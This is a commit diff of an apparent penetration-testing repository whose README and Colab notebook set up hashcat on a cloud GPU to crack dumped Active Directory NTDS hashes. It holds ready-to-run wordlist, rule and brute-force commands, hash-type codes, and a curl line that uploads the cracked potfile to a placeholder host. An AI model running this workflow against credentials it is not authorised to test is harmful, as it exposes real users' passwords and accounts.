Example NTDS
parent
96088a98d8
commit
e011bf2098
38
README.md
38
README.md
|
@ -7,32 +7,46 @@ Néphélées (Νεφήλαι, Nephḗlai) : cloud nymphs greek - also ntds crack
|
||||||
|
|
||||||
## V1 - Google Colab
|
## V1 - Google Colab
|
||||||
|
|
||||||
Roll for Tesla P100
|
|
||||||
|
|
||||||
* https://github.com/ShutdownRepo/hashonymize
|
* https://github.com/ShutdownRepo/hashonymize
|
||||||
* https://github.com/ShutdownRepo/google-colab-hashcat
|
* https://github.com/ShutdownRepo/google-colab-hashcat
|
||||||
* https://github.com/mxrch/penglab
|
* https://github.com/mxrch/penglab
|
||||||
|
* https://colab.research.google.com/drive/1arm1_HEMb868mk18FlLkEcqvHPB_Ibgb#scrollTo=lWPQqb3oETLd
|
||||||
|
|
||||||
```ps1
|
```ps1
|
||||||
Go on : https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb
|
Go on : https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb
|
||||||
Select "Runtime", "Change runtime type", and set "Hardware accelerator" to GPU.
|
Select "Runtime", "Change runtime type", and set "Hardware accelerator" to GPU.
|
||||||
Change the config by setting "True" at tools you want to install.
|
Change the config by setting "True" at tools you want to install.
|
||||||
Select "Runtime" and "Run all" !
|
Select "Runtime" and "Run all" !
|
||||||
|
|
||||||
|
|
||||||
Workflow example 3 (OPSEC: crack anonymized hashes)
|
|
||||||
run the preparation script below
|
|
||||||
on your local machine, run hashonymize to anonymize your hash lists
|
|
||||||
upload your anon hashes list on the colab !wget http://yourip:yourport/yourfile
|
|
||||||
run a hashcat command like this to start cracking !hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt
|
|
||||||
recover the .pot file from the Google Colab !curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/
|
|
||||||
on your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password hashcat --potfile-path hashcat.potfile --hash-type 1000 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt
|
|
||||||
hashcat -m 1000 --potfile-path ntds.cracked ntds.tocrack --show --username
|
|
||||||
```
|
```
|
||||||
|
|
||||||
* markov, keyboard walking, dico + rules , haveibeenpwn
|
* markov, keyboard walking, dico + rules , haveibeenpwn
|
||||||
* reuse old pot (extract passwd to new wordlist)
|
* reuse old pot (extract passwd to new wordlist)
|
||||||
|
|
||||||
|
Here are some of the most used attack modes for the `--attack-mode` option
|
||||||
|
```
|
||||||
|
0 Wordlist (with or without rules)
|
||||||
|
3 Pure bruteforce
|
||||||
|
```
|
||||||
|
|
||||||
|
Here are some of the most used hash types for the `--hash-type` option
|
||||||
|
```ps1
|
||||||
|
1000 NTLM (actually its for NT hashes)
|
||||||
|
3000 LM
|
||||||
|
5500 Net-NTLMv1 (actually, it should be called NTLMv1)
|
||||||
|
5600 Net-NTLMv2 (actually, it should be called NTLMv2)
|
||||||
|
13100 Kerberoast
|
||||||
|
18200 ASREProast
|
||||||
|
22000 WPA-PBKDF2-PMKID+EAPOL
|
||||||
|
16800 WPA-PMKID-PBKDF2
|
||||||
|
0 md5
|
||||||
|
100 sha1
|
||||||
|
1400 sha2-256
|
||||||
|
1700 sha2-512
|
||||||
|
|
||||||
|
# 2 hours
|
||||||
|
-a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1
|
||||||
|
```
|
||||||
|
|
||||||
## V2 - UI
|
## V2 - UI
|
||||||
|
|
||||||
* https://github.com/Coalfire-Research/npk
|
* https://github.com/Coalfire-Research/npk
|
||||||
|
|
|
@ -3,10 +3,9 @@
|
||||||
"nbformat_minor": 0,
|
"nbformat_minor": 0,
|
||||||
"metadata": {
|
"metadata": {
|
||||||
"colab": {
|
"colab": {
|
||||||
"name": "google-colab-hashcat.ipynb",
|
"name": "google_colab_hashcat.ipynb",
|
||||||
"provenance": [],
|
"provenance": [],
|
||||||
"collapsed_sections": [],
|
"collapsed_sections": []
|
||||||
"include_colab_link": true
|
|
||||||
},
|
},
|
||||||
"kernelspec": {
|
"kernelspec": {
|
||||||
"name": "python3",
|
"name": "python3",
|
||||||
|
@ -18,169 +17,187 @@
|
||||||
{
|
{
|
||||||
"cell_type": "markdown",
|
"cell_type": "markdown",
|
||||||
"metadata": {
|
"metadata": {
|
||||||
"id": "view-in-github",
|
"id": "bcgg59uiIxrv"
|
||||||
"colab_type": "text"
|
|
||||||
},
|
},
|
||||||
"source": [
|
"source": [
|
||||||
"<a href=\"https://colab.research.google.com/github/ShutdownRepo/google-colab-hashcat/blob/main/google_colab_hashcat.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>"
|
"# Nephelees - NTDS cracking on Google Colab\r\n",
|
||||||
]
|
"1. Select \"Runtime\", \"Change runtime type\", and set \"Hardware accelerator\" to GPU. \r\n",
|
||||||
},
|
"2. Select \"Runtime\" and \"Run all\" !\r\n",
|
||||||
{
|
"1. on your local machine, run [hashonymize](https://github.com/ShutdownRepo/hashonymize) to anonymize your hash lists\r\n",
|
||||||
"cell_type": "markdown",
|
"2. upload your anon hashes list on the colab `!wget http://yourip:yourport/yourfile` or with the upload button\r\n",
|
||||||
"metadata": {
|
"3. install requirements\r\n",
|
||||||
"id": "2ommePNS-o92"
|
"4. run a hashcat command like this to start cracking `!hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\r\n",
|
||||||
},
|
"5. recover the .pot file from the Google Colab `!curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/`\r\n",
|
||||||
"source": [
|
"6. on your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password `hashcat --potfile-path hashcat.potfile --hash-type 1000 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\r\n",
|
||||||
"# Google colab hash cracking\n",
|
"\r\n",
|
||||||
"\n",
|
"**/!\\** For every 12hrs or so Disk, RAM, VRAM, CPU cache etc data that is on our alloted virtual machine will get erased. "
|
||||||
"<p align=\"center\">\n",
|
|
||||||
" <a href=\"https://colab.research.google.com/github/ShutdownRepo/google-colab-hashcat/blob/main/google_colab_hashcat.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>\n",
|
|
||||||
" <a href=\"https://twitter.com/intent/follow?screen_name=_nwodtuhs\" title=\"Follow\"><img src=\"https://img.shields.io/twitter/follow/_nwodtuhs?label=Shutdown&style=social\"></a>\n",
|
|
||||||
"</p>\n",
|
|
||||||
"\n",
|
|
||||||
"## Workflow example 1 (simple wordlist)\n",
|
|
||||||
"\n",
|
|
||||||
"This Google colab can be used for hash cracking with wordlists and rules.\n",
|
|
||||||
"Here is an example of that can be followed to crack NT hashes.\n",
|
|
||||||
"\n",
|
|
||||||
"1. run the preparation script below\n",
|
|
||||||
"2. upload your hashes list on the colab `!wget http://yourip:yourport/yourfile`\n",
|
|
||||||
"3. run a hashcat command like this to start cracking `!hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\n",
|
|
||||||
"\n",
|
|
||||||
"## Workflow example 2 (wordlist + rules)\n",
|
|
||||||
"\n",
|
|
||||||
"This is an example that is especially useful for internal engagements where users often use a transformation of the corp name as password (i.e. Corp2016!).\n",
|
|
||||||
"\n",
|
|
||||||
"1. create a wordlist based on some names that are currently used in the company\n",
|
|
||||||
"```\n",
|
|
||||||
"company\n",
|
|
||||||
"cpmny\n",
|
|
||||||
"corp\n",
|
|
||||||
"management\n",
|
|
||||||
"admin\n",
|
|
||||||
"```\n",
|
|
||||||
"2. upload your hashes list on the colab `!wget http://yourip:yourport/yourfile`\n",
|
|
||||||
"3. run the hashcat command `!hashcat --status --hash-type 1000 --attack-mode 0 --username --rules-file rules/d3adhob0.rule DOMAIN.LOCAL.ntds company.lst`\n",
|
|
||||||
"\n",
|
|
||||||
"## Workflow example 3 (OPSEC: crack anonymized hashes)\n",
|
|
||||||
"\n",
|
|
||||||
"1. run the preparation script below\n",
|
|
||||||
"2. on your local machine, run [hashonymize](https://github.com/ShutdownRepo/hashonymize) to anonymize your hash lists\n",
|
|
||||||
"3. upload your anon hashes list on the colab `!wget http://yourip:yourport/yourfile`\n",
|
|
||||||
"4. run a hashcat command like this to start cracking `!hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\n",
|
|
||||||
"5. recover the .pot file from the Google Colab `!curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/`\n",
|
|
||||||
"6. on your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password `hashcat --potfile-path hashcat.potfile --hash-type 1000 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\n",
|
|
||||||
"\n",
|
|
||||||
"hashcat -m 1000 --potfile-path ntds.cracked ntds.tocrack --show --username\n",
|
|
||||||
"\n",
|
|
||||||
"## Short hashcat manual\n",
|
|
||||||
"\n",
|
|
||||||
"Here are some useful options\n",
|
|
||||||
"```\n",
|
|
||||||
"--status Enable automatic update of the status screen\n",
|
|
||||||
"--attack-mode Attack-mode, see references below\n",
|
|
||||||
"--hash-type Hash-type, see references below\n",
|
|
||||||
"--username Enable ignoring of usernames in hashfile \n",
|
|
||||||
"--rules-file Multiple rules applied to each word from wordlists\n",
|
|
||||||
"--potfile-path Specific path to potfile\n",
|
|
||||||
"```\n",
|
|
||||||
"\n",
|
|
||||||
"Here are some of the most used attack modes for the `--attack-mode` option\n",
|
|
||||||
"```\n",
|
|
||||||
"0 Wordlist (with or without rules)\n",
|
|
||||||
"3 Pure bruteforce\n",
|
|
||||||
"```\n",
|
|
||||||
"\n",
|
|
||||||
"Here are some of the most used hash types for the `--hash-type` option\n",
|
|
||||||
"```\n",
|
|
||||||
"1000 NTLM (actually it's for NT hashes)\n",
|
|
||||||
"3000 LM\n",
|
|
||||||
"5500 Net-NTLMv1 (actually, it should be called NTLMv1)\n",
|
|
||||||
"5600 Net-NTLMv2 (actually, it should be called NTLMv2)\n",
|
|
||||||
"13100 Kerberoast\n",
|
|
||||||
"18200 ASREProast\n",
|
|
||||||
"22000 WPA-PBKDF2-PMKID+EAPOL\n",
|
|
||||||
"16800 WPA-PMKID-PBKDF2\n",
|
|
||||||
"0 md5\n",
|
|
||||||
"100 sha1\n",
|
|
||||||
"1400 sha2-256\n",
|
|
||||||
"1700 sha2-512\n",
|
|
||||||
"```\n",
|
|
||||||
"\n",
|
|
||||||
"# Credits\n",
|
|
||||||
"Credits go to mxrch for his original project called [penglab](https://github.com/mxrch/penglab)"
|
|
||||||
]
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"cell_type": "markdown",
|
|
||||||
"metadata": {
|
|
||||||
"id": "NMFCTYwaKtu7"
|
|
||||||
},
|
|
||||||
"source": [
|
|
||||||
"# Your hash cracking starts here"
|
|
||||||
]
|
]
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"cell_type": "code",
|
"cell_type": "code",
|
||||||
"metadata": {
|
"metadata": {
|
||||||
"id": "7ucWO9luB4RG"
|
"colab": {
|
||||||
|
"base_uri": "https://localhost:8080/"
|
||||||
|
},
|
||||||
|
"id": "A86GVzaW6YpT",
|
||||||
|
"outputId": "fbeb72d7-0174-4812-91fe-6e74dba550ce"
|
||||||
},
|
},
|
||||||
"source": [
|
"source": [
|
||||||
"# 1. Run the preparation basis\n",
|
"# Check GPU (Tesla P100 is the best GPU on Colab)\r\n",
|
||||||
"# Edit the wordlists and rules you want\n",
|
"!nvidia-smi -L"
|
||||||
"\n",
|
],
|
||||||
"rockyou = True\n",
|
"execution_count": null,
|
||||||
"hashesorg2019 = False # huge wordlist (~12GB, ~6mins download)\n",
|
"outputs": [
|
||||||
"quickrules = True # hob064.rule\n",
|
{
|
||||||
"extensiverules = True # d3adhob0.rule\n",
|
"output_type": "stream",
|
||||||
"\n",
|
"text": [
|
||||||
"import os\n",
|
"GPU 0: Tesla P100-PCIE-16GB (UUID: GPU-711e1706-fccb-c944-73a8-796eb7a9d342)\n"
|
||||||
"\n",
|
],
|
||||||
"def install():\n",
|
"name": "stdout"
|
||||||
" rules_dir = \"rules\"\n",
|
}
|
||||||
" wordlists_dir = \"wordlists\"\n",
|
]
|
||||||
" # Removing the default sample data\n",
|
},
|
||||||
" !rm -r sample_data/\n",
|
{
|
||||||
" # Installing hashcat\n",
|
"cell_type": "code",
|
||||||
" print(\"[+] Installation of hashcat...\")\n",
|
"metadata": {
|
||||||
" !apt install cmake build-essential -y\n",
|
"id": "LWWa641VMu7Y"
|
||||||
" !apt install checkinstall git -y\n",
|
},
|
||||||
" !git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install\n",
|
"source": [
|
||||||
"\n",
|
"# Install Hashcat\r\n",
|
||||||
" # Installing wordlists\n",
|
"!apt install cmake build-essential -y\r\n",
|
||||||
" os.system(\"wordlists_dir={}\".format(wordlists_dir))\n",
|
"!apt install checkinstall git -y\r\n",
|
||||||
" !mkdir ./$wordlists_dir\n",
|
"!git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install"
|
||||||
" if rockyou:\n",
|
],
|
||||||
" !printf \"[+] Downloading the Rockyou wordlist...\\n\"\n",
|
"execution_count": null,
|
||||||
" !cd $wordlists_dir && wget https://download.weakpass.com/wordlists/90/rockyou.txt.gz\n",
|
"outputs": []
|
||||||
" !printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\n",
|
},
|
||||||
" !cd $wordlists_dir && gunzip rockyou.txt.gz\n",
|
{
|
||||||
" !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep rockyou)\"\n",
|
"cell_type": "code",
|
||||||
"\n",
|
"metadata": {
|
||||||
" if hashesorg2019:\n",
|
"id": "_M4BMeXCNCA8",
|
||||||
" !printf \"[+] Downloading the HashesOrg2019 wordlist...\\n\"\n",
|
"colab": {
|
||||||
" !cd $wordlists_dir && wget https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\n",
|
"base_uri": "https://localhost:8080/"
|
||||||
" !printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\n",
|
},
|
||||||
" !cd $wordlists_dir && gunzip hashesorg2019.gz\n",
|
"outputId": "f08a6696-17ca-4415-f572-402e96fb7717"
|
||||||
" !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep hashesorg2019)\"\n",
|
},
|
||||||
"\n",
|
"source": [
|
||||||
" # Installing rules\n",
|
"# Download wordlists\r\n",
|
||||||
" os.system(\"rules_dir={}\".format(rules_dir))\n",
|
"import os\r\n",
|
||||||
" !mkdir ./$rules_dir\n",
|
"wordlists_dir = \"wordlists\"\r\n",
|
||||||
" if quickrules:\n",
|
"os.system(\"wordlists_dir={}\".format(wordlists_dir))\r\n",
|
||||||
" !printf \"[+] Downloading the hob064 ruleset...\\n\"\n",
|
"!mkdir ./$wordlists_dir\r\n",
|
||||||
" !cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule\n",
|
"\r\n",
|
||||||
" !printf \"[+] Rules downloaded !\\n\"\n",
|
"!printf \"[+] Downloading the Rockyou wordlist...\\n\"\r\n",
|
||||||
" !printf \"[+] Location : $(pwd)/$rules_dir/$(ls rules | grep hob064)\"\n",
|
"!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/90/rockyou.txt.gz\r\n",
|
||||||
" if extensiverules:\n",
|
"!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n",
|
||||||
" !printf \"[+] Downloading the d3adhob0 ruleset...\\n\"\n",
|
"!cd $wordlists_dir && gunzip rockyou.txt.gz\r\n",
|
||||||
" !cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule\n",
|
"!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep rockyou)\"\r\n",
|
||||||
" !printf \"[+] Rules downloaded !\\n\"\n",
|
"\r\n",
|
||||||
" !printf \"[+] Location : $(pwd)/$rules_dir/$(ls rules | grep d3adhob0)\"\n",
|
"!printf \"[+] Downloading the KerberoastPW wordlist...\\n\"\r\n",
|
||||||
"\n",
|
"!cd $wordlists_dir && wget https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\r\n",
|
||||||
"install()\n",
|
"!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n",
|
||||||
"!printf \"\\n[+] Install is over, listing rules and wordlists...\\n\"\n",
|
"!cd $wordlists_dir && unxz kerberoast_pws.xz\r\n",
|
||||||
"!ls rules wordlists"
|
"!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep kerberoast_pws)\"\r\n",
|
||||||
|
"\r\n",
|
||||||
|
"!printf \"[+] Downloading the HashesOrg2019 wordlist...\\n\"\r\n",
|
||||||
|
"!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\r\n",
|
||||||
|
"!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n",
|
||||||
|
"!cd $wordlists_dir && gunzip hashesorg2019.gz\r\n",
|
||||||
|
"!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep hashesorg2019)\"\r\n",
|
||||||
|
"\r\n",
|
||||||
|
"# !printf \"[+] Downloading the Have I been Pwned V7 wordlist...\\n\"\r\n",
|
||||||
|
"# !cd $wordlists_dir && wget https://hashes.org/download.php?type=found&hashlistId=8161 -O \tHaveIbeenPwnedV7.txt\r\n",
|
||||||
|
"# !printf \"[+] Wordlist downloaded !\\n[+]\\n\"\r\n",
|
||||||
|
"# !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep HaveIbeenPwnedV7)\"\r\n"
|
||||||
|
],
|
||||||
|
"execution_count": 20,
|
||||||
|
"outputs": [
|
||||||
|
{
|
||||||
|
"output_type": "stream",
|
||||||
|
"text": [
|
||||||
|
"mkdir: cannot create directory ‘./wordlists’: File exists\n",
|
||||||
|
"[+] Downloading the Rockyou wordlist...\n",
|
||||||
|
"--2020-12-21 15:03:51-- https://download.weakpass.com/wordlists/90/rockyou.txt.gz\n",
|
||||||
|
"Resolving download.weakpass.com (download.weakpass.com)... 104.21.234.151, 104.21.234.150, 2606:4700:3038::6815:ea97, ...\n",
|
||||||
|
"Connecting to download.weakpass.com (download.weakpass.com)|104.21.234.151|:443... connected.\n",
|
||||||
|
"HTTP request sent, awaiting response... 200 OK\n",
|
||||||
|
"Length: 53357062 (51M) [application/octet-stream]\n",
|
||||||
|
"Saving to: ‘rockyou.txt.gz’\n",
|
||||||
|
"\n",
|
||||||
|
"rockyou.txt.gz 100%[===================>] 50.88M 11.8MB/s in 5.3s \n",
|
||||||
|
"\n",
|
||||||
|
"2020-12-21 15:03:56 (9.59 MB/s) - ‘rockyou.txt.gz’ saved [53357062/53357062]\n",
|
||||||
|
"\n",
|
||||||
|
"[+] Wordlist downloaded !\n",
|
||||||
|
"[+] Extraction...\n",
|
||||||
|
"gzip: rockyou.txt already exists; do you wish to overwrite (y or n)? ^C\n",
|
||||||
|
"[+] Finished !\n",
|
||||||
|
"[+] Location : /content/wordlists/rockyou.txt\n",
|
||||||
|
"rockyou.txt.gz[+] Downloading the KerberoastPW wordlist...\n",
|
||||||
|
"--2020-12-21 15:05:19-- https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\n",
|
||||||
|
"Resolving gist.github.com (gist.github.com)... 192.30.255.113\n",
|
||||||
|
"Connecting to gist.github.com (gist.github.com)|192.30.255.113|:443... connected.\n",
|
||||||
|
"HTTP request sent, awaiting response... 301 Moved Permanently\n",
|
||||||
|
"Location: https://gist.githubusercontent.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz [following]\n",
|
||||||
|
"--2020-12-21 15:05:19-- https://gist.githubusercontent.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\n",
|
||||||
|
"Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...\n",
|
||||||
|
"Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|151.101.0.133|:443... connected.\n",
|
||||||
|
"HTTP request sent, awaiting response... 200 OK\n",
|
||||||
|
"Length: 98784072 (94M) [application/octet-stream]\n",
|
||||||
|
"Saving to: ‘kerberoast_pws.xz.1’\n",
|
||||||
|
"\n",
|
||||||
|
"kerberoast_pws.xz.1 100%[===================>] 94.21M 185MB/s in 0.5s \n",
|
||||||
|
"\n",
|
||||||
|
"2020-12-21 15:05:21 (185 MB/s) - ‘kerberoast_pws.xz.1’ saved [98784072/98784072]\n",
|
||||||
|
"\n",
|
||||||
|
"[+] Wordlist downloaded !\n",
|
||||||
|
"[+] Extraction...\n",
|
||||||
|
"unxz: kerberoast_pws: File exists\n",
|
||||||
|
"[+] Finished !\n",
|
||||||
|
"[+] Location : /content/wordlists/kerberoast_pws\n",
|
||||||
|
"kerberoast_pws.xz\n",
|
||||||
|
"kerberoast_pws.xz.1[+] Downloading the HashesOrg2019 wordlist...\n",
|
||||||
|
"--2020-12-21 15:05:21-- https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\n",
|
||||||
|
"Resolving download.weakpass.com (download.weakpass.com)... 104.21.234.150, 104.21.234.151, 2606:4700:3038::6815:ea97, ...\n",
|
||||||
|
"Connecting to download.weakpass.com (download.weakpass.com)|104.21.234.150|:443... connected.\n",
|
||||||
|
"HTTP request sent, awaiting response... 200 OK\n",
|
||||||
|
"Length: 4468104490 (4.2G) [application/octet-stream]\n",
|
||||||
|
"Saving to: ‘hashesorg2019.gz’\n",
|
||||||
|
"\n",
|
||||||
|
"hashesorg2019.gz 100%[===================>] 4.16G 11.7MB/s in 6m 0s \n",
|
||||||
|
"\n",
|
||||||
|
"2020-12-21 15:11:21 (11.9 MB/s) - ‘hashesorg2019.gz’ saved [4468104490/4468104490]\n",
|
||||||
|
"\n",
|
||||||
|
"[+] Wordlist downloaded !\n",
|
||||||
|
"[+] Extraction...\n",
|
||||||
|
"[+] Finished !\n",
|
||||||
|
"[+] Location : /content/wordlists/hashesorg2019"
|
||||||
|
],
|
||||||
|
"name": "stdout"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"cell_type": "code",
|
||||||
|
"metadata": {
|
||||||
|
"id": "d1cxo70DQDxs"
|
||||||
|
},
|
||||||
|
"source": [
|
||||||
|
"# Download rules\r\n",
|
||||||
|
"import os\r\n",
|
||||||
|
"rules_dir = \"/content/hashcat/rules\"\r\n",
|
||||||
|
"os.system(\"rules_dir={}\".format(rules_dir))\r\n",
|
||||||
|
"!mkdir ./$rules_dir\r\n",
|
||||||
|
"\r\n",
|
||||||
|
"!printf \"[+] Downloading the hob064 ruleset...\\n\"\r\n",
|
||||||
|
"!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule\r\n",
|
||||||
|
"!printf \"[+] Rules downloaded !\\n\"\r\n",
|
||||||
|
"!printf \"[+] Location : $(ls $rules_dir | grep hob064)\"\r\n",
|
||||||
|
"\r\n",
|
||||||
|
"!printf \"[+] Downloading the d3adhob0 ruleset...\\n\"\r\n",
|
||||||
|
"!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule\r\n",
|
||||||
|
"!printf \"[+] Rules downloaded !\\n\"\r\n",
|
||||||
|
"!printf \"[+] Location : $(ls $rules_dir | grep d3adhob0)\""
|
||||||
],
|
],
|
||||||
"execution_count": null,
|
"execution_count": null,
|
||||||
"outputs": []
|
"outputs": []
|
||||||
|
@ -202,17 +219,99 @@
|
||||||
{
|
{
|
||||||
"cell_type": "code",
|
"cell_type": "code",
|
||||||
"metadata": {
|
"metadata": {
|
||||||
"id": "xYgvNWGbKXSp"
|
"id": "xYgvNWGbKXSp",
|
||||||
|
"colab": {
|
||||||
|
"base_uri": "https://localhost:8080/"
|
||||||
|
},
|
||||||
|
"outputId": "cfbf1c6b-7d90-4108-fefa-e7566ad718b1"
|
||||||
},
|
},
|
||||||
"source": [
|
"source": [
|
||||||
"# 3. Crack your hashes\n",
|
"# 3. Crack your hashes\n",
|
||||||
"# Examples\n",
|
"\n",
|
||||||
"# !hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt\n",
|
"# Quick cracking - rockyou wordlist - around 10 minutes\n",
|
||||||
"# !hashcat --status --hash-type 1000 --attack-mode 0 --username --rules-file rules/hob064.rule DOMAIN.LOCAL.ntds company.lst\n",
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --username\n",
|
||||||
"!hashcat --benchmark"
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/hob064.rule --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/d3adhob0.rule --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/dive.rule --username\n",
|
||||||
|
"\n",
|
||||||
|
"# Medium cracking - kerberoast wordlist - around 30 minutes\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/hob064.rule --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/d3adhob0.rule --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/dive.rule --username\n",
|
||||||
|
"\n",
|
||||||
|
"# Insane cracking - hashesorg2019 wordlist - several days ?\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --username\n",
|
||||||
|
"!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/hob064.rule --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/d3adhob0.rule --username\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/dive.rule --username\n",
|
||||||
|
"\n",
|
||||||
|
"# ----- around 3 hours on a p100 ------\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1\n",
|
||||||
|
"# ----- more than 3 days on a P100 --------\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a \n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a?a"
|
||||||
],
|
],
|
||||||
"execution_count": null,
|
"execution_count": null,
|
||||||
"outputs": []
|
"outputs": [
|
||||||
|
{
|
||||||
|
"output_type": "stream",
|
||||||
|
"text": [
|
||||||
|
"hashcat (v6.1.1-120-g15bf8b730) starting...\n",
|
||||||
|
"\n",
|
||||||
|
"\u001b[31mnvmlDeviceGetFanSpeed(): Not Supported\u001b[0m\n",
|
||||||
|
"\n",
|
||||||
|
"CUDA API (CUDA 10.1)\n",
|
||||||
|
"====================\n",
|
||||||
|
"* Device #1: Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU\n",
|
||||||
|
"\n",
|
||||||
|
"OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]\n",
|
||||||
|
"========================================================================\n",
|
||||||
|
"* Device #2: Tesla P100-PCIE-16GB, skipped\n",
|
||||||
|
"\n",
|
||||||
|
"Minimum password length supported by kernel: 0\n",
|
||||||
|
"Maximum password length supported by kernel: 27\n",
|
||||||
|
"\n",
|
||||||
|
"Hashes: 45 digests; 45 unique digests, 1 unique salts\n",
|
||||||
|
